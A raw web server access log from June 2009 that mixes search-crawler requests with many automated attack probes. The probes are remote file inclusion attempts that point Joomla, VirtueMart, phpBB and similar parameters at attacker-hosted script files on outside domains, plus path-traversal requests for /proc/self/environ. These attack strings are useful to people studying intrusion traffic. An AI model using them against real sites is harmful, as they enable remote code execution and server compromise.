62.128.135.52 - - [12/Jun/2009:02:33:34 -0400] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:33:39 -0400] "GET /images/_notes/nav_store_cart_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:33:48 -0400] "GET /images/_notes/store_anim_r2_c1_f7.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:33:50 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
124.217.216.86 - - [12/Jun/2009:02:33:51 -0400] "GET /logs/access_log.Q109060800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:02:33:51 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:02:33:51 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
66.249.71.54 - - [12/Jun/2009:02:33:59 -0400] "GET /images/_notes/nav_store_expr_blue.jpg.mno HTTP/1.1" 200 246 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [12/Jun/2009:02:34:02 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:02:34:02 -0400] "GET /logs/access_log.Q109060800/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
124.217.216.86 - - [12/Jun/2009:02:34:02 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
66.249.71.54 - - [12/Jun/2009:02:34:08 -0400] "GET /images/_notes/download_tut_tissue.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:34:17 -0400] "GET /images/_notes/banner_connect_over.gif.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:34:21 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:34:21 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:34:24 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:34:27 -0400] "GET /images/_notes/store_anim_r2_c1_f3.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [12/Jun/2009:02:34:37 -0400] "GET /logs/access_log.Q109060100//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://cafe0.fileave.com/id.feelcomz.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:34:37 -0400] "GET /images/_notes/home_welcome_bkgrd2.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.0.66 - - [12/Jun/2009:02:34:42 -0400] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:34:43 -0400] "GET /logs/access_log.Q109053100%20%20/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.111.0.66 - - [12/Jun/2009:02:34:43 -0400] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:34:47 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.gif.mno HTTP/1.1" 200 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.0.66 - - [12/Jun/2009:02:34:47 -0400] "GET /logs/access_log.Q109052600%20%20/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:34:56 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c3.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [12/Jun/2009:02:35:02 -0400] "GET /logs/access_log.Q109050300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
66.249.71.54 - - [12/Jun/2009:02:35:05 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.217.216.86 - - [12/Jun/2009:02:35:15 -0400] "GET /logs/access_log.Q109050300/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
66.249.71.54 - - [12/Jun/2009:02:35:16 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c2.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:35:25 -0400] "GET /images/_notes/download_coming_soon.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:35:34 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c1.jpg.mno HTTP/1.1" 200 265 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:35:45 -0400] "GET /images/_notes/nav_store_ckout_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:35:54 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c3.jpg.mno HTTP/1.1" 200 266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.120.90.222 - - [12/Jun/2009:02:35:56 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:02:35:56 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
199.120.90.222 - - [12/Jun/2009:02:35:56 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.199.14.40 - - [12/Jun/2009:02:36:03 -0400] "GET /logs/error_log.Q109052500//blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:36:04 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c3.jpg.mno HTTP/1.1" 200 267 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:36:13 -0400] "GET /images/_notes/nav_store_ckout_blue.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.120.90.222 - - [12/Jun/2009:02:36:13 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:36:24 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c2.jpg.mno HTTP/1.1" 200 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jun/2009:02:36:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [12/Jun/2009:02:36:33 -0400] "GET /images/_notes/nav_store_index_over.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:36:42 -0400] "GET /images/_notes/ace_bkgrd_wide_r4_c3.jpg.mno HTTP/1.1" 200 267 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.120.90.222 - - [12/Jun/2009:02:36:43 -0400] "GET /logs/access_log.Q109060500%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:36:52 -0400] "GET /images/_notes/ace_bkgrd_wide_r2_c1.gif.mno HTTP/1.1" 200 264 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.120.90.222 - - [12/Jun/2009:02:36:54 -0400] "GET /logs/access_log.Q109052800%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:37:02 -0400] "GET /images/_notes/download_cat_missing.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:37:11 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:37:11 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:37:11 -0400] "GET /images/_notes/nav_store_search_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:37:12 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:37:21 -0400] "GET /images/_notes/download_tut_2stg_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:37:31 -0400] "GET /images/_notes/ace_bkgrd_wide_r3_c4.jpg.mno HTTP/1.1" 200 268 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.128.135.52 - - [12/Jun/2009:02:37:35 -0400] "GET //index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:37:41 -0400] "GET /images/_notes/download_tut_2stg_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.111.0.66 - - [12/Jun/2009:02:37:48 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:37:50 -0400] "GET /images/_notes/download_tut_1stg_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:37:59 -0400] "GET /images/_notes/download_tut_1stg_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:38:10 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c4.jpg.mno HTTP/1.1" 200 268 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.28.145.13 - - [12/Jun/2009:02:38:18 -0400] "GET //index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.806"
66.249.71.54 - - [12/Jun/2009:02:38:19 -0400] "GET /images/_notes/nav_store_search_org2.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:38:29 -0400] "GET /images/_notes/ace_bkgrd_white_r1_c3.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:38:38 -0400] "GET /images/_notes/nav_store_search_blue.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.128.135.52 - - [12/Jun/2009:02:38:48 -0400] "GET /logs/access_log.Q109051000//index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:38:48 -0400] "GET /images/_notes/nav_store_search_numb.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:38:58 -0400] "GET /images/_notes/nav_store_search_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:00 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:01 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:01 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:01 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:39:07 -0400] "GET /images/_notes/ace_bkgrd_white_r2_c3.jpg.mno HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:39:18 -0400] "GET /images/_notes/circle_convention_off.jpg.mno HTTP/1.1" 200 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:39:22 -0400] "GET /logs/error_log.Q109051000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:39:27 -0400] "GET /images/_notes/nav_store_search_over.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [12/Jun/2009:02:39:27 -0400] "GET //galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
218.249.36.194 - - [12/Jun/2009:02:39:28 -0400] "GET //galeria.php?start=0&kategoria=http://208.98.22.241/id.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
118.129.166.203 - - [12/Jun/2009:02:39:33 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:39:36 -0400] "GET /images/_notes/ace_bkgrd_white_r2_c1.gif.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:39:39 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:39:44 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:39:46 -0400] "GET /images/_notes/nav_store_search_name.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:39:49 -0400] "GET /logs/access_log.Q109051600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:39:56 -0400] "GET /images/_notes/ace_bkgrd_white_r1_c1.gif.mno HTTP/1.1" 200 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [12/Jun/2009:02:40:04 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/Jun/2009:02:40:04 -0400] "GET /errors.php?error=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/Jun/2009:02:40:04 -0400] "GET /logs/errors.php?error=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:40:06 -0400] "GET /images/_notes/ace_bkgrd_white_r3_c1.jpg.mno HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.34.78.110 - - [12/Jun/2009:02:40:08 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:40:08 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [12/Jun/2009:02:40:08 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
74.6.22.170 - - [12/Jun/2009:02:40:07 -0400] "GET /logs/error_log.Q109061200 HTTP/1.0" 200 412805 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:40:15 -0400] "GET /images/_notes/nav_store_search_icon.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:40:24 -0400] "GET /images/_notes/ace_bkgrd_white_r1_c2.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:40:35 -0400] "GET /images/_notes/download_sell_miss_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:40:40 -0400] "GET /images/logo_11.gif HTTP/1.1" 200 773 "-" "Googlebot-Image/1.0"
118.129.166.203 - - [12/Jun/2009:02:40:44 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:40:44 -0400] "GET /logs/access_log.Q109060500//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Jun/2009:02:40:44 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:40:44 -0400] "GET /images/_notes/ace_bkgrd_white_r2_c2.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:40:53 -0400] "GET /images/_notes/nav_store_search_name2.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.129.166.203 - - [12/Jun/2009:02:40:59 -0400] "GET /logs/access_log.Q109052800//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:41:04 -0400] "GET /images/_notes/circle_convention_over.jpg.mno HTTP/1.1" 200 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:41:13 -0400] "GET /images/_notes/nav_store_search_numb2.jpg.mno HTTP/1.1" 200 248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [12/Jun/2009:02:41:15 -0400] "GET /logs/access_log.Q109052500/errors.php?error=http://hac.or.kr/technote7/data/idnovo.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:41:23 -0400] "GET /images/_notes/download_cat_instr.4_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jun/2009:02:41:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [12/Jun/2009:02:41:30 -0400] "GET /logs/access_log.Q109052900%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:41:32 -0400] "GET /images/_notes/nav_store_fav_off_r1_c4.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.165.73.157 - - [12/Jun/2009:02:41:35 -0400] "GET /logs/access_log.Q109053000%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:41:42 -0400] "GET /images/_notes/nav_store_fav_off_r1_c3.jpg.mno HTTP/1.1" 200 210 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:41:52 -0400] "GET /images/_notes/download_cat_instr.4_lg.jpg.mno HTTP/1.1" 200 257 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:42:01 -0400] "GET /images/_notes/nav_store_fav_off_r1_c2.jpg.mno HTTP/1.1" 200 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:42:11 -0400] "GET /images/_notes/nav_store_fav_off_r1_c5.jpg.mno HTTP/1.1" 200 211 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:42:21 -0400] "GET /images/_notes/banner_connect_off_r2_c1.gif.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
